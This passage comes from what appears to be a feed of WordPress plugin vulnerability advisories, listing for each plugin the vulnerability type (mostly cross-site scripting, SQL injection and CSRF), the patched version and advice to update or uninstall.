Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 9.3
Recommended Action: Update to version 9.3, or a newer patched version

Plugin: Salon Booking System

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.9.4
Recommended Action: Update to version 7.9.4, or a newer patched version

Plugin: Shortcodes Finder

Vulnerability: Reflected Cross-Site Scripting via nonce
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: WP Map Block – Gutenberg Map Block for Google Map and OpenStreet Map by aBlocks

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: Help Desk WP

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pretty Google Calendar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via pretty_google_calendar shortcode
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Duplicate Page

Vulnerability: SQL Injection
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Car Rental by BestWebSoft

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: GDPR/CCPA Cookie Consent <= 6.4.4
Patched Version: 6.4.5
Recommended Action: Update to version 6.4.5, or a newer patched version

Plugin: WP User – Custom Registration Forms, Login and User Profile

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: EWWW Image Optimizer

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 5.9
Recommended Action: Update to version 5.9, or a newer patched version

Plugin: Easy Social Icons

Vulnerability: No subtitle
Patched Version: 3.0.9
Recommended Action: Update to version 3.0.9, or a newer patched version

Plugin: YourMembership Single Sign On – YM SSO Login

Vulnerability: Missing Authorization
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Manager for Icomoon

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Easy Captcha

Vulnerability: Missing Authorization via easy_captcha_update_settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Email Marketing Plugin – WP Email Capture

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.10
Recommended Action: Update to version 3.10, or a newer patched version

Plugin: PPOM – Product Addons & Custom Fields for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 32.0.6
Recommended Action: Update to version 32.0.6, or a newer patched version

Plugin: MiniMax – Page Layout Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple History – Track, Log, and Audit WordPress Changes

Vulnerability: Authenticated (Subscriber+) CSV Injection
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: AJAX Multi Upload

Vulnerability: Arbitrary File Upload
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Multiple Post Passwords

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: WP Post to PDF

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PhonePe Payment Solutions

Vulnerability: Authenticated (Subscriber+) Server-Side Request Forgery
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WP Clean Up

Vulnerability: Cross-Site Request Forgery via wp_clean_up_optimize
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LDD Directory Lite

Vulnerability: <= 3.5
Patched Version: 3.6
Recommended Action: Update to version 3.6, or a newer patched version

Plugin: SlideDeck 2 Lite Responsive Content Slider

Vulnerability: Local/Remote File Inclusion
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: GigPress

Vulnerability: SQL Injection
Patched Version: 2.3.9
Recommended Action: Update to version 2.3.9, or a newer patched version

Plugin: HC Custom WP-Admin URL

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Custom Banners

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.3
Recommended Action: Update to version 3.3, or a newer patched version

Plugin: Nexter Extension

Vulnerability: Reflected Cross-Site Scripting via post and post_id
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Tracking Code Manager

Vulnerability: Cross-Site Scripting
Patched Version: 1.11.5
Recommended Action: Update to version 1.11.5, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Information Disclosure via Debug Log
Patched Version: 4.13.3
Recommended Action: Update to version 4.13.3, or a newer patched version

Plugin: WP Data Access – App, Table, Form and Chart Builder plugin

Vulnerability: Authenticated (Subscriber+) Privilege Escalation
Patched Version: 5.3.8
Recommended Action: Update to version 5.3.8, or a newer patched version

Plugin: Futurio Extra

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Social Sharing Plugin – Social Warfare

Vulnerability: Social Warfare <= 4.4.3
Patched Version: 4.4.4
Recommended Action: Update to version 4.4.4, or a newer patched version

Plugin: Accordion

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YITH Maintenance Mode

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: WooCommerce Product Categories Selection Widget

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Amazon JS

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy PayPal & Stripe Buy Now Button

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: BBS e-Popup

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Make Connector

Vulnerability: Authenticated (Subscriber+) Information Disclosure
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: All-in-One Video Gallery

Vulnerability: Admin+ Local File Inclusion
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: GDPR Cookie Compliance – Cookie Banner, Cookie Consent, Cookie Notice – CCPA, DSGVO, RGPD

Vulnerability: Cross-Site Request Forgery to License Modification
Patched Version: 4.12.5
Recommended Action: Update to version 4.12.5, or a newer patched version

Plugin: LadiApp: Landing Page, PopupX, Marketing Automation, Affiliate Marketing…

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: LetsRecover – WooCommerce Abandoned Cart Notifications

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Currency Switcher for WooCommerce

Vulnerability: Authorization Bypass
Patched Version: 2.11.2
Recommended Action: Update to version 2.11.2, or a newer patched version

Plugin: TinyMCE Color Picker

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: WordPress Ping Optimizer

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.35.1.3.0
Recommended Action: Update to version 2.35.1.3.0, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: CF7 Invisible reCAPTCHA

Vulnerability: Cross-Site Request Forgery via vsz_cf7_invisible_recaptcha_page
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Buddyboss Platform

Vulnerability: SQL Injection
Patched Version: 1.7.9
Recommended Action: Update to version 1.7.9, or a newer patched version

Plugin: wp-restful

Vulnerability: Multiple Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.7
Recommended Action: Update to version 3.1.7, or a newer patched version

Plugin: FoxyPress

Vulnerability: Arbitrary File Upload
Patched Version: 0.4.2.2
Recommended Action: Update to version 0.4.2.2, or a newer patched version

Plugin: Albo Pretorio On line

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.6.2
Recommended Action: Update to version 4.6.2, or a newer patched version

Plugin: SCORM Cloud For WordPress

Vulnerability: SQL Injection
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Authenticated (Subscriber+) Information Disclosure via mf_last_name shortcode
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Contact Form to Any API

Vulnerability: Authenticated (Administrator+) SQL Injection via ‘form_id’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: WP Shamsi – افزونه تاریخ شمسی و فارسی ساز وردپرس

Vulnerability: Missing Authorization leading to Authenticated (Subscriber+) Attachment Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Redirection

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.12
Recommended Action: Update to version 2.2.12, or a newer patched version

Plugin: qTranslate

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Rss Poster

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 1-flash-gallery

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SMS OVH

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Custom Post Type Page Template

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Get Custom Field Values

Vulnerability: Arbitrary Post Metadata Access
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: WP-Invoice – Web Invoice and Billing

Vulnerability: Missing Authorization
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Vertical scroll recent post

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 14.0
Recommended Action: Update to version 14.0, or a newer patched version

Plugin: Team Showcase

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.22.16
Recommended Action: Update to version 1.22.16, or a newer patched version

Plugin: Redirects

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Visitors Online by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: Archivist – Custom Archive Templates

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: Amazon Affiliate

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.17.1
Recommended Action: Update to version 3.17.1, or a newer patched version

Plugin: All-in-One WP Migration and Backup

Vulnerability: Unauthenticated Reflected Cross-Site Scripting
Patched Version: 7.63
Recommended Action: Update to version 7.63, or a newer patched version

Plugin: Delhivery Logistics Courier

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Canto

Vulnerability: Blind Server-Side Request Forgery via download.php
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Contact Form by ContactMe.com

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.4.6
Recommended Action: Update to version 6.4.6, or a newer patched version

Plugin: CMS Press

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple URLs – Link Cloaking, Product Displays, and Affiliate Link Management

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 115
Recommended Action: Update to version 115, or a newer patched version

Plugin: Daily Prayer Time

Vulnerability: Cross-Site Request Forgery
Patched Version: 2023.03.17
Recommended Action: Update to version 2023.03.17, or a newer patched version

Plugin: Quick Contact Form

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 8.0.4
Recommended Action: Update to version 8.0.4, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Unprotected Functions
Patched Version: 8.0.33
Recommended Action: Update to version 8.0.33, or a newer patched version

Plugin: Custom Admin Login Page | WPZest

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Fancier Author Box by ThematoSoup

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Post Statistics (Visitors & Visits Counter)

Vulnerability: Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: DTracker

Vulnerability: Authorization Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: furikake

Vulnerability: Open Redirect
Patched Version: 0.1.1
Recommended Action: Update to version 0.1.1, or a newer patched version

Plugin: YouTube Embed, Playlist and Popup by WpDevArt

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 2.3.9
Recommended Action: Update to version 2.3.9, or a newer patched version

Plugin: Sermon Browser

Vulnerability: SQL Injection
Patched Version: 0.43.6
Recommended Action: Update to version 0.43.6, or a newer patched version

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: IP Spoofing via HTTP header
Patched Version: 6.1
Recommended Action: Update to version 6.1, or a newer patched version

Plugin: Ultimate Addons for WPBakery

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.19.15
Recommended Action: Update to version 3.19.15, or a newer patched version

Plugin: WP Job Board

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 5.6.0
Recommended Action: Update to version 5.6.0, or a newer patched version

Plugin: underConstruction

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.09
Recommended Action: Update to version 1.09, or a newer patched version

Plugin: Moosend Website Connector

Vulnerability: Missing Authorization
Patched Version: 1.0.190
Recommended Action: Update to version 1.0.190, or a newer patched version

Plugin: Google Authenticator – WordPress 2FA, OTP SMS and Email

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 5.5.6
Recommended Action: Update to version 5.5.6, or a newer patched version

Plugin: Namaste! LMS

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.5.9.2
Recommended Action: Update to version 2.5.9.2, or a newer patched version

Plugin: WPGlobus – Multilingual WordPress

Vulnerability: Cross-Site Scripting via wpglobus_option[post_type][post]
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: ShortCodes UI

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP SMS – Ultimate SMS & MMS Notifications, 2FA, OTP, and Integrations with WooCommerce, GravityForms, and More

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 5.4.13
Recommended Action: Update to version 5.4.13, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via header_size
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Age Verification

Vulnerability: Open Redirect
Patched Version: 0.5
Recommended Action: Update to version 0.5, or a newer patched version

Plugin: Game tabs

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Education – Education WordPress Plugin for Elementor

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: Ultimate Addons for WPBakery

Vulnerability: Cross-Site Scripting
Patched Version: 3.16.12
Recommended Action: Update to version 3.16.12, or a newer patched version

Plugin: JobSearch WP Job Board

Vulnerability: Missing Authorization on jobsearch_update_job_import_schedule_call() function
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Uploading SVG, WEBP and ICO files

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: GDPR Cookie Compliance – Cookie Banner, Cookie Consent, Cookie Notice – CCPA, DSGVO, RGPD

Vulnerability: Missing Authorization
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Rank Math SEO – AI SEO Tools to Dominate SEO Rankings

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.119.1
Recommended Action: Update to version 1.0.119.1, or a newer patched version

Plugin: BackupBuddy

Vulnerability: 8.7.4.1
Patched Version: 8.7.5
Recommended Action: Update to version 8.7.5, or a newer patched version

Plugin: GigPress

Vulnerability: SQL Injection
Patched Version: 2.3.11
Recommended Action: Update to version 2.3.11, or a newer patched version

Plugin: Pricing Table Plugin

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.6.1
Recommended Action: Update to version 3.6.1, or a newer patched version

Plugin: a3 Portfolio

Vulnerability: Cross-Site Request Forgery to Settings Changes
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Reflected Cross-Site Scripting via ip
Patched Version: 1.3.2.4
Recommended Action: Update to version 1.3.2.4, or a newer patched version

Plugin: Skype Legacy Buttons

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Search Analytics for WP

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: Cookie Notice & Compliance for GDPR / CCPA

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via ‘cookies_revoke_shortcode’ Shortcode
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: Events Made Easy

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.5.50
Recommended Action: Update to version 1.5.50, or a newer patched version

Plugin: menu shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: User Metadata Information Disclosure
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Simple Giveaways – Grow your business, email lists and traffic with contests

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via form fields
Patched Version: 2.45.1
Recommended Action: Update to version 2.45.1, or a newer patched version

Plugin: Gallery Bank – WordPress Photo Gallery Plugin

Vulnerability: Stored Cross-Site Scripting via Gallery Description
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SEOPress – On-site SEO

Vulnerability: 5.0.3
Patched Version: 5.0.4
Recommended Action: Update to version 5.0.4, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.5.6
Recommended Action: Update to version 3.5.6, or a newer patched version

Plugin: IP Metaboxes

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Cross-Site Scripting
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: wp-rocket

Vulnerability: Local File Inclusion
Patched Version: 2.10.4
Recommended Action: Update to version 2.10.4, or a newer patched version

Plugin: IMPress for IDX Broker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Plugin: All-in-One Addons for Elementor – WidgetKit

Vulnerability: WidgetKit <= 2.3.9
Patched Version: 2.3.10
Recommended Action: Update to version 2.3.10, or a newer patched version

Plugin: LetsRecover – WooCommerce Abandoned Cart Notifications

Vulnerability: Unauthenticated SQL Injection via AJAX action
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Profile Extra Fields by BestWebSoft

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: WP Replicate Post

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: Advanced Youtube Channel Pagination

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CPO Companion

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Feed Changer & Remover

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 0.3
Recommended Action: Update to version 0.3, or a newer patched version

Plugin: Pixabay Images

Vulnerability: Arbitrary File Upload
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Newsletter Manager

Vulnerability: Cross-Site Scripting via test_mail.php
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: IURNY by INDIGITALL – WhatsApp Chat, Web Push Notifications (FREE)

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: WP User – Custom Registration Forms, Login and User Profile

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Inline Google Maps

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RSS Feed Widget

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: Image vertical reel scroll slideshow

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Video Gallery – YouTube Playlist, Channel Gallery by YotuWP

Vulnerability: Missing Authorization
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Shopping Cart & eCommerce Store

Vulnerability: 3.0.20
Patched Version: 3.0.21
Recommended Action: Update to version 3.0.21, or a newer patched version

Plugin: Envato Sales By Item

Vulnerability: Unauthenticated SQL Injection via AJAX call
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Table Builder – WordPress Table Plugin

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Walk Score Plugin

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Back In Stock Notifier for WooCommerce | Manage Inventory and Waitlist Product for WooCommerce

Vulnerability: Information Disclosure
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: All custom fields & groups

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.05
Recommended Action: Update to version 1.05, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery via Widget Editing
Patched Version: 3.7.17
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.17, 3.8.17, 3.9.15, 4.0.14, 4.1.14, 4.2.11, 4.3.7, 4.4.6, 4.5.5, 4.6.2, 4.7.1

Plugin: Translate WordPress – Google Language Translator

Vulnerability: Missing Authorization via admin notifications
Patched Version: 6.0.20
Recommended Action: Update to version 6.0.20, or a newer patched version

Plugin: tencentcloud-cos

Vulnerability: Missing Authorization via AJAX actions
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YouTube WordPress Plugin by Embed Plus

Vulnerability: Cross-Site Request Forgery
Patched Version: 11.8.2
Recommended Action: Update to version 11.8.2, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Privilege Escalation via accept-to-be-teacher action parameter
Patched Version: 3.2.6.9
Recommended Action: Update to version 3.2.6.9, or a newer patched version

Plugin: Simple Cloudflare Turnstile – CAPTCHA Alternative

